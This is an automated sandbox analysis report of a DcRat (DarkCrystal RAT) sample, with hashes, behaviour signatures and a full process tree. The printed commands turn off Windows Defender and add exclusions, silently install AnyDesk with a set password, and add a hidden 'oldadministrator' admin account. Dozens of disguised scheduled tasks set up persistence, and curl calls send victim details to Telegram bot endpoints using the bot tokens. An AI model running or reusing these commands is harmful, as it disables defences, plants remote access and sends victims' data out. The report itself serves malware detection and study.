Resubmissions
26-12-2022 00:04
221226-acrmcafe2y 1026-12-2022 00:03
221226-acfvvafe2x 1026-12-2022 00:03
221226-ab851acc75 1026-12-2022 00:03
221226-ab3m8afe2w 1026-12-2022 00:02
221226-abs4sacc74 1026-12-2022 00:01
221226-abb59scc72 10Analysis
-
max time kernel
151s -
max time network
155s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
-
submitted
26-12-2022 00:03
General
-
Target
tmp.exe
-
Size
15.7MB
-
MD5
b27e540aef37c99f3cfd2766c2e61784
-
SHA1
c516b74daec17d1bc788c54433cf10899ee07e92
-
SHA256
28ebd60f492ca0957ac7ab3fdbcd8262966dee60dbec71d6bcac8d7efaf65479
-
SHA512
641d5daaef91d535f279ce7fea1f7c8b50ba87040480602e51951dfc2f3345699d3161d38b1b2ab7b3d4fbbcc56e0d597f125ed65ea3971df4888cb4a63897cd
-
SSDEEP
393216:XhBqJ0CE8/eXkkM7cGGBNpuXU8ysXVqNIyc2KBcr27eEHTPX:RBe0CiMihuXU8yYqNIygdrX
Malware Config
Extracted
https://ipinfo.io/ip
Signatures
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Modifies WinLogon for persistence 2 TTPs 16 IoCs
-
Process spawned unexpected child process 48 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
DCRat payload 7 IoCs
Detects payload of DCRat, commonly dropped by NSIS installers.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 1 IoCs
-
Executes dropped EXE 22 IoCs
-
Possible privilege escalation attempt 11 IoCs
-
Checks computer location settings 2 TTPs 5 IoCs
Looks up country code configured in the registry, likely geofence.
-
Loads dropped DLL 3 IoCs
-
Modifies file permissions 1 TTPs 11 IoCs
-
Adds Run key to start application 2 TTPs 32 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops file in Program Files directory 13 IoCs
-
Drops file in Windows directory 24 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 48 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 11 IoCs
-
Enumerates processes with tasklist 1 TTPs 3 IoCs
-
Kills process with taskkill 2 IoCs
-
Modifies Internet Explorer settings 1 TTPs 3 IoCs
-
Modifies data under HKEY_USERS 21 IoCs
-
Modifies registry class 18 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious behavior: LoadsDriver 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 10 IoCs
-
Suspicious use of SendNotifyMessage 3 IoCs
-
Suspicious use of SetWindowsHookEx 4 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmp.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\migration , c:\users\kbtgt\desktop , C:\Windows\tasks , C:\Windows , C:\Windows\Logs , C:\Windows\SysWOW64 , C:\Windows\System32\WindowsPowerShell\v1.0 , C:\ProgramData , C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe , powershell.exe , c:\2⤵
-
C:\programdata\1.exe"C:\programdata\1.exe" /D2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\programdata\dc.exe"C:\programdata\dc.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\runtimeMonitor\eW0NlR3z8rHah1r0tet2KhNAo.vbe"3⤵
- Checks computer location settings
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\runtimeMonitor\PsYm20I.bat" "4⤵
-
C:\runtimeMonitor\ComdriverSvc.exe"C:\runtimeMonitor\ComdriverSvc.exe"5⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
- Drops file in Program Files directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\ZdF8h4HwiS.bat"6⤵
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:27⤵
-
C:\Recovery\WindowsRE\conhost.exe"C:\Recovery\WindowsRE\conhost.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'6⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/runtimeMonitor/'6⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'6⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/odt/'6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\programdata\any.exe"C:\programdata\any.exe"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\programdata\ru.bat" "2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\chcp.comchcp 650011⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\programdata\any.bat" "1⤵
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\chcp.comchcp 650012⤵
-
C:\Windows\SysWOW64\net.exenet stop TaskSc2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM anydesk.exe /F2⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM wininit1.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell cmd.exe /c C:\ProgramData\wsappz.exe --install C:\ProgramData\AnyDesk --start-with-win --silent2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c C:\ProgramData\wsappz.exe --install C:\ProgramData\AnyDesk --start-with-win --silent3⤵
-
C:\ProgramData\wsappz.exeC:\ProgramData\wsappz.exe --install C:\ProgramData\AnyDesk --start-with-win --silent4⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\net.exenet stop AnyDesk2⤵
-
C:\Windows\SysWOW64\net.exenet stop TaskScs2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell cmd.exe /c echo Pass325522⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c echo Pass325523⤵
-
C:\ProgramData\AnyDesk\AnyDesk.exeC:\ProgramData\AnyDesk\anydesk.exe --set-password2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup administrateurs oldadministrator /add3⤵
-
C:\Windows\SysWOW64\timeout.exeTIMEOUT /T 10 /NOBREAK2⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\timeout.exeTIMEOUT /T 10 /NOBREAK2⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup administradores oldadministrator /add3⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell cmd.exe /c C:\ProgramData\AnyDesk\anydesk.exe --get-id2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\timeout.exeTIMEOUT /T 10 /NOBREAK2⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c find /n /v ""2⤵
-
C:\Windows\SysWOW64\find.exefind /n /v ""3⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "(new-object System.Net.WebClient).DownloadString('https://ipinfo.io/ip')"2⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
-
\??\c:\windows\curl.exec:\windows\curl.exe --insecure --data chat_id="552691400" --data parse-mode=markdown --data-urlencode text="ANY_TMKNGOMU'id:'"0"'ip:'"154.61.71.13"" "https://api.telegram.org/bot"5513453963:AAEqmVGigjirKuykDiL7YHcdVrBQ72q07Ss"/sendMessage"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c find /n /v ""2⤵
-
C:\Windows\SysWOW64\net.exenet user oldadministrator "Pass32552" /add2⤵
-
C:\Windows\SysWOW64\net.exenet localgroup администраторы oldadministrator /add2⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v oldadministrator /t REG_DWORD /d 0 /f2⤵
-
C:\Windows\SysWOW64\net.exenet localgroup administrateurs oldadministrator /add2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\net.exenet localgroup administratoren oldadministrator /add2⤵
-
C:\Windows\SysWOW64\net.exenet localgroup administradores oldadministrator /add2⤵
-
C:\Windows\SysWOW64\net.exenet localgroup Administrators oldadministrator /ADD2⤵
-
C:\Windows\SysWOW64\timeout.exeTIMEOUT /T 10 /NOBREAK1⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop TaskSc1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AnyDesk1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop TaskScs1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K "c:\programdata\st.bat"1⤵
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" dir "C:\ProgramData\Microsoft\Windows Defender" "2⤵
-
C:\Windows\SysWOW64\findstr.exefindstr /i "Platform"2⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath c:\windows\migration\ , c:\users\kbtgt\desktop\ , C:\Windows\tasks\ , C:\Windows\ , C:\Windows\Logs\ , C:\Windows\SysWOW64\ , C:\Windows\System32\WindowsPowerShell\v1.0\ , C:\ProgramData\2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\timeout.exeTIMEOUT /T 10 /NOBREAK2⤵
- Delays execution with timeout.exe
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\takeown.exetakeown /f c:\windows\tasks2⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\SysWOW64\find.exefind /I /N "Superfetch.exe"2⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist /FI "IMAGENAME eq Superfetch.exe"2⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Tasks" /inheritance:e /grant "*S-1-1-0:(R,REA,RA,RD)" "*S-1-5-7:(R,REA,RA,RD)"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Tasks" /inheritance:e /grant "Administrators:(R,REA,RA,RD)"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Tasks" /inheritance:e /grant "Admin:(R,REA,RA,RD)"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Tasks" /inheritance:e /grant "Admin:(R,REA,RA,RD)"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Tasks" /inheritance:e /grant "EVERYONE:(R,REA,RA,RD)"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\SysWOW64\timeout.exeTIMEOUT /T 10 /NOBREAK2⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Tasks" /inheritance:e /grant "Users:(R,REA,RA,RD)"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Tasks" /inheritance:e /grant "SYSTEM:(R,REA,RA,RD)"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
\??\c:\programdata\migrate.exec:\programdata\migrate.exe -p44322⤵
- Executes dropped EXE
- Checks computer location settings
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\windows\tasks\run.bat" "3⤵
-
C:\Windows\SysWOW64\timeout.exeTIMEOUT /T 1 /NOBREAK4⤵
- Delays execution with timeout.exe
-
C:\windows\tasks\Wmiic.exe"C:\windows\tasks\wmiic.exe" install WMService IntelConfigService.exe4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\timeout.exeTIMEOUT /T 2 /NOBREAK4⤵
- Delays execution with timeout.exe
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\windows\tasks\Wmiic.exe"C:\windows\tasks\wmiic" start WMService4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\net.exenet start WMService4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start WMService5⤵
-
C:\Windows\SysWOW64\timeout.exeTIMEOUT /T 3 /NOBREAK2⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\timeout.exeTIMEOUT /T 60 /NOBREAK2⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\tasklist.exetasklist /FI "IMAGENAME eq Superfetch.exe"2⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\find.exefind /I /N "Superfetch.exe"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WMIC CPU Get Name /Value|FindStr .2⤵
-
C:\Windows\SysWOW64\findstr.exeFindStr .3⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC CPU Get Name /Value3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WMIC /Node:localhost Path Win32_VideoController Get Name /Value| FIND.EXE "="2⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC /Node:localhost Path Win32_VideoController Get Name /Value3⤵
-
C:\Windows\SysWOW64\find.exeFIND.EXE "="3⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist /FI "IMAGENAME eq Superfetch.exe"2⤵
- Enumerates processes with tasklist
-
C:\Windows\SysWOW64\find.exefind /I /N "Superfetch.exe"2⤵
-
\??\c:\windows\curl.exec:\windows\curl.exe --insecure --data chat_id="552691400" --data parse-mode=markdown --data-urlencode text="TMKNGOMUCORE2Intel Core Processor (Broadwell)Microsoft Basic Display AdapterSERVICE WMService RUN" "https://api.telegram.org/bot"5086556714:AAF7DbEW7CWKb1GEIy6_inxVlrGJ39JUUBM"/sendMessage"2⤵
- Executes dropped EXE
-
C:\ProgramData\AnyDesk\AnyDesk.exe"C:\ProgramData\AnyDesk\AnyDesk.exe" --service1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "IdleI" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Windows Mail\Idle.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Mail\Idle.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "IdleI" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Windows Mail\Idle.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "AnyDeskA" /sc MINUTE /mo 14 /tr "'C:\odt\AnyDesk.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "AnyDesk" /sc ONLOGON /tr "'C:\odt\AnyDesk.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "AnyDeskA" /sc MINUTE /mo 12 /tr "'C:\odt\AnyDesk.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smsss" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows Defender\ja-JP\smss.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Program Files\Windows Defender\ja-JP\smss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smsss" /sc MINUTE /mo 7 /tr "'C:\Program Files\Windows Defender\ja-JP\smss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "AnyDeskA" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Windows Portable Devices\AnyDesk.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "AnyDesk" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Portable Devices\AnyDesk.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\ProgramData\AnyDesk\AnyDesk.exe"C:\ProgramData\AnyDesk\AnyDesk.exe" --control1⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\WmiPrvSE.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\WmiPrvSE.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\odt\winlogon.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 12 /tr "'C:\odt\winlogon.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 6 /tr "'C:\odt\winlogon.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Users\Default User\cmd.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\SppExtComObj.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "powershellp" /sc MINUTE /mo 5 /tr "'C:\odt\powershell.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "powershell" /sc ONLOGON /tr "'C:\odt\powershell.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 9 /tr "'C:\Users\All Users\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows Portable Devices\cmd.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Mail\cmd.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Program Files\Windows Mail\cmd.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "MoUsoCoreWorkerM" /sc MINUTE /mo 11 /tr "'C:\Program Files\Reference Assemblies\Microsoft\Framework\MoUsoCoreWorker.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\conhost.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\conhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\conhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\odt\Registry.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 12 /tr "'C:\odt\Registry.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 7 /tr "'C:\odt\Registry.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "MoUsoCoreWorkerM" /sc MINUTE /mo 8 /tr "'C:\Program Files\Reference Assemblies\Microsoft\Framework\MoUsoCoreWorker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "MoUsoCoreWorker" /sc ONLOGON /tr "'C:\Program Files\Reference Assemblies\Microsoft\Framework\MoUsoCoreWorker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Mail\cmd.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Program Files\Windows Portable Devices\cmd.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Portable Devices\cmd.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Users\All Users\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 5 /tr "'C:\Users\All Users\RuntimeBroker.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "powershellp" /sc MINUTE /mo 9 /tr "'C:\odt\powershell.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\SppExtComObj.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SppExtComObj" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\SppExtComObj.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\dllhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\dllhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\dllhost.exe'" /f1⤵
- Process spawned unexpected child process
